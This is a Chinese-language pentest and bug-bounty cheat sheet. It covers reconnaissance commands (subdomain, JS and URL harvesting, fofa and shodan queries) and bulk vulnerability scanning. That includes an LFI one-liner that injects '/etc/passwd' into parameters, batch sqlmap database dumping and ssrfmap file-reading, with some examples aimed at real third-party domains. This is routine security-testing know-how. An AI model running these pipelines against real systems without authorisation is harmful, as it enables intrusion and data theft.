实战再慢慢改
备案查询 1 https://beian.miit.gov.cn/#/Integrated/index
企查查
证书透明度查子域名
提取,替换域名
1 curl -s "https://crt.sh/?q=域名&output=json" | jq -r '.[].name_value'| sed 's/\*\.//g' | sort -u | tee -a sh.txt
whois查询 1 whois.domaintools.com 网站
或者命令行
nslookup windows命令 1 2 3 4 5 6 7 nslookup testphp.vulnweb.com -d 列出所有记录 Server: 表示用于查询的DNS服务器名称(这里是 public1.114dns.com) Address: DNS服务器的IP地址(这里是 114.114.114.114) Non-authoritative answer: 表示这是非权威答案,即此信息可能来自缓存而不是权威DNS服务器 Name: 查询的域名(这里是 testphp.vulnweb.com) Address: 解析得到的IP地址(这里是 44.228.249.3)
网站信息查找 1 2 whatweb testphp.vulnweb.com 命令 Wappalyzer 浏览器插件
防火墙测试 1 wafw00f testphp.vulnweb.com
theHarvester 需要太多api 1 python3 theHarvester.py -d baidu.com -b bing,yahoo,baidu
recon-ng 似msf Maltego 有社区版 有谷歌语法模板,但是全英文好像对中国没用
1 https://pentest-tools.com/
获取网站图标哈希值 1 curl https://favicon-hash.kmsec.uk/api/?url=https://test.com/favicon.ico | jq
黑暗引擎 fofa
1 2 3 4 5 6 7 host="gzu.edu.cn" && status_code="200" 状态为200 after="2017-01-01" && before="2017-10-01" 时间 host="gzu.edu.cn" && status_code="200" && after="2020-01-01" && before="2024-6-01" icp="京ICP证030173号" ip="1.1.1.1" icon_hash="11111111555" ip=”1.1.1.1/24” c段资产
shodan
1 ssl:"testphp.vulnweb.com" 200
子域名收集 subfinder、sublist3r、oneforall、amass、ksubdomain、spyhunt 昆虫猎人
amass被动子域名收集最多,subfinder被动最快,ksubdoamin主动收集最多最快
1 2 subfinder list url.txt>sub.txt subfinder -d testphp.vulnweb.com -o subs.txt
1 sublist3r -v -d testphp.vulnweb.com -p 80,443
1 2 subfinder -d target.com -silent | dnsx -silent | httpx -silent | grep -E --color 'api|dev|stg|test|admin|demo|stage|pre|vpn' 用dnsx验证再用httpx探测web服务,过滤带api等的域名
1 2 subfinder -d example.com -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u 跟随重定向
1 .\ksubdomain.exe e -d cc.cn -o gz.txt windows(内置字典)
存活探测 1 2 3 cat sub.txt | httpx-toolkit -ports 443,80,8080,8888 -threads 200 -mc 200 -o aaa.txt cat sub.txt | httpx -sc -td -ip httpx -l on-run.txt -td -title -ip -sc -mc 200,301
工具
1 https://gitee.com/ma-fanxiang/fast-see 结果输出详细
js查找 gau、subjs、linkfinder、waybackurls、katana、urlfinder
1 2 3 https://github.com/lc/gau https://github.com/lc/subjs https://github.com/GerbenJavado/LinkFinder
1 cat url.txt | gau | subjs | tee js.txt gau从域名提取url,subjs提取js
1 cat url.txt | waybackurls | subjs waybackurls国内网站抓取得少 先看看有没有抓取
1 cat sbu.txt | waybackurls | tee urls.txt 时光回溯
1 urlfinder -u http://www.baidu.com -s 200,403 -m 2 好用
1 2 3 4 5 katana -u https://www.csmu.edu.tw/ -jc -d 2 | grep ".js$" | uniq | sort > test.txt cat target.txt | (gau || hakrawler || waybackurls || katana) | grep -i -E "\.js" | egrep -v "\.json|\.jsp" | anew js.txt
js提取敏感信息 1 https://github.com/MrEmpy/mantra
Trufflehog 信息泄露插件 apikey验证 1 https://github.com/streaak/keyhacks
查找ip 1 https://github.com/projectdiscovery/uncover
1 echo 'ssl:"Uber Technologies, Inc."' | uncover
1 2 3 4 5 subfinder -d domain | httpx -sc -td -ip | tee file.txt grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' file.txt 从文件中提取IP sudo nmap -sV -sC -v -p- -T4 127.0.0.1 -Pn
用户名枚举github仓库 1 https://github.com/trickest/enumerepo
目录扫描 1 feroxbuster -u https://www.csmu.edu.tw/ -s 200 301 403 -n
1 2 3 dirsearch -u https://testphp.vulnweb.com/ -i 200,301,302 dirsearch -l gzgy.txt -x -t 50 -x 302,400-520 --exclude-text=html,js,json 去除js.html.json 不好使 dirsearch -l gzcj.txt -t 50 -x 500,502,404,401,400 -r 2 递归扫描
武士刀.. 1 2 3 4 5 6 7 8 9 10 11 12 13 爬取 katana -u https://www.csmu.edu.tw katana -list url_list.txt cat domains | httpx | katana js扫描 echo www.viator.com | katana -ps | grep -E "\.js$" | nuclei -t /home/coffinxp/nuclei-templates/http/exposures/ -c 30 paramspider -l li.txt 自动保存在results文件夹下 photon工具 python photon.py -u https://www.baidu.com/ --keys -o /root/Desktop/eh0 提取url cat urls.txt | cut -d "/" -f3 | sort | uniq > endpoints.txt
1 2 ssrfmap测试ssrf 需要请求包 python3 ssrfmap.py -r /home/coffinxp/raw.txt -p url -m readfiles,portscan
1 2 模糊测试 nuclei -l urls.txt -t /nuclei-templates/fuzzing-templates/
LFI 1 2 3 4 5 6 7 nuclei -list sus.txt -t /nuclei-templates/vulnerabilities/lfi -o lfi.txt nuclei -list ravageband.txt -tags lfi 批量 cat subs.txt | gau uro | gf lfi | qsreplace "/etc/passwd" | while read url; do curl -s "$url" | grep -q "root:x:"; if [ $? -eq 0 ]; then echo "存在LFI漏洞 $url"; fi; done cat subs.txt | gau | xargs -n 1 -I {} sh -c 'curl "{}" | grep "/etc/passwd" && echo "{} is vulnerable to LFI"' > lfi.txt
1 2 3 4 5 6 7 漏扫 扫描js nuclei -t /nuclei-templates/http/exposures/ -l js.txt -o js1.txt nuclei -l gzgy.txt -t cves/ -severity critical,high cve高 for i in $(cat subs.txt); do ./xray_linux_amd64 ws --basic-crawler $i --plugins xss,sqldet,xxe,ssrf,cmd-injection,path-traversal --ho $(date +"%T").html ; done xray批量
xss扫描 xss备忘单
1 https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
1 2 3 4 5 cat sub.txt | kxss python3 xsstrike.py -u "url" -l 4 -t 10 echo "testphp.vulnweb.com" | waybackurls | httpx -silent | Gxss -c 100 -p Xss | sort -u | dalfox pipe
sql注入 1 2 3 4 5 6 7 8 ## sqlmap echo "url" | gau | gf sqli | tee sql.txt sqlmap -m sql.txt --dbs --batch --random-agent subfinder -d domain.com -all -silent | gau | urldedupe | gf sqli > sql.txt; sqlmap -m sql.txt --batch --dbs --risk 2 --level 5 --random-agent | tee -a sql1.txt 自动查找子域名提取url确定一个url只测试一次 调用sqlmap批量